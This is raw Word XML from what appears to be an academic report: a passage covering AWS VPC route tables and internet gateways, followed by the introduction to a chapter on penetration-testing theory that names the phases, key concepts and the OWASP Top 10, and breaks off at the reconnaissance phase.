    <w:p w14:paraId="0017ECB5" w14:textId="0D8417EE" w:rsidR="00DD429B" w:rsidRPr="00D77DFE" w:rsidRDefault="007C1F80" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc223521089"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.10 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Route Tables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="5793EE85" w14:textId="4395EA96" w:rsidR="00A62A28" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Route tables </w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">define </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">how network traffic is directed </w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>the VPC. Each route table</w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> has</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules </w:t>
      </w:r>
      <w:r w:rsidR="00E03C92" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">specify the destination IP range and the corresponding target, such as another subnet, an Internet Gateway, or </w:t>
      </w:r>
      <w:r w:rsidR="00E03C92" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">even </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">a NAT device. Proper route table configuration is </w:t>
      </w:r>
      <w:r w:rsidR="00E03C92" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">fundamental </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>for enabling communication between internal resources and external networks.</w:t>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="30" w:name="paragraph11"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource11"</w:instrText>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C60F71" w14:textId="51C60BF1" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="00773913" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc223521090"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.11 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Internet Gateway (IGW)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="1F11F59A" w14:textId="0AAB517B" w:rsidR="00084D54" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="001465F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidR="00AB515D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>IGW</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r w:rsidR="00845E2C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>n another</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPC component </w:t>
      </w:r>
      <w:r w:rsidR="00845E2C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">which provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">communication between resources within the VPC and the public internet. By attaching an Internet Gateway to the VPC and configuring appropriate routes, instances located in public subnets </w:t>
      </w:r>
      <w:r w:rsidR="00DC408B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00DC408B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00845E2C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>to send and receive internet traffic.</w:t>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="paragraph12"/>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource12"</w:instrText>
      </w:r>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43146C89" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc223521091"/>
    </w:p>
    <w:p w14:paraId="3F29E76E" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB27A57" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2951F74B" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F52FCD1" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0997C2B2" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6223650C" w14:textId="6703F0DC" w:rsidR="004E18EC" w:rsidRPr="00D77DFE" w:rsidRDefault="00E225AF" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00E80F4E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. PENETRATION TESTING </w:t>
      </w:r>
      <w:r w:rsidR="00DF2376" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E80F4E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>THEORETICAL BACKGROUND</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="047CBDE4" w14:textId="30B7CA58" w:rsidR="009E776C" w:rsidRPr="00D77DFE" w:rsidRDefault="009E776C" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc223521092"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="262DFC15" w14:textId="20A661EA" w:rsidR="0090347A" w:rsidRPr="00D77DFE" w:rsidRDefault="006D7553" w:rsidP="00DF2376">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">What types of information are required to perform penetration testing on a complex system, such as a web application running on Linux within a local area network (LAN) with multiple open ports? This chapter presents the theoretical background of penetration testing, including its definition and core phases. It also introduces key concepts such as scope, proof of concept, </w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, payload, exploit, privilege escalation, and pivoting. In addition, the chapter covers the OWASP Top 10 vulnerabilities, reverse shells, and the tools commonly used in penetration testing, including those applied throughout this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6303ADFE" w14:textId="777DB4D5" w:rsidR="00901E73" w:rsidRPr="00D77DFE" w:rsidRDefault="004753AC" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc223521093"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00901E73" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="0B7CA657" w14:textId="6DE49AB0" w:rsidR="004753AC" w:rsidRPr="00D77DFE" w:rsidRDefault="00B37DA5" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Penetration testing is a type of testing that focuses on cybersecurity criteria. The goal of a penetration test is to identify vulnerabilities and weaknesses within a specified scope. Penetration testing includes several phases to perform</w:t>
      </w:r>
      <w:r w:rsidR="00876376" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00876376" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00876376" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>section describes the most common and important phases used by penetration testers and security engineers</w:t>
      </w:r>
      <w:r w:rsidR="000E4D23" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004B0474" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="36" w:name="paragraph13"/>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource13"</w:instrText>
      </w:r>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004B0474" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidR="00005638" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E1AFF" w14:textId="4341CCEB" w:rsidR="00563B7A" w:rsidRPr="00D77DFE" w:rsidRDefault="009416E5" w:rsidP="00E225AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E225AF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance and Scanning</w:t>
      </w:r>
      <w:r w:rsidR="004A0B4D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00563B7A" w:rsidRPr="00D77DFE">
        <w:rPr>
